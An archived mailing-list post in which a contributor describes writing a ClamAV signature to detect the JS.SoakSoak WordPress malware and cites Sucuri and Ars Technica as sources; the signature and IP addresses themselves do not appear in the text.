[Community-sigs] JS.SoakSoak signature

Willian Cruz willianalbertocruz at outlook.com.br
Wed Dec 17 17:41:27 EST 2014

Good night guys,
First of all, thanks Shaun, you were right about ClamAV not decoding the eval() on the javascript. Using the dump left by ClamAV I could create the sig and it's working now.
This sig can now detect both encoded and decoded html and js files that contains the malware. The sig follows: 
Using data collected by Sucuri, the attacks came from these IPs addresses: and, so I recommend giving this addresses to CISCO for further investigation.
For sample I used the code released by Sucuri in a js test file, and the code you can see here on this article from ArsTechnica: http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
I got the IP's from Sucuri's blog: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html

More information about the Community-sigs mailing list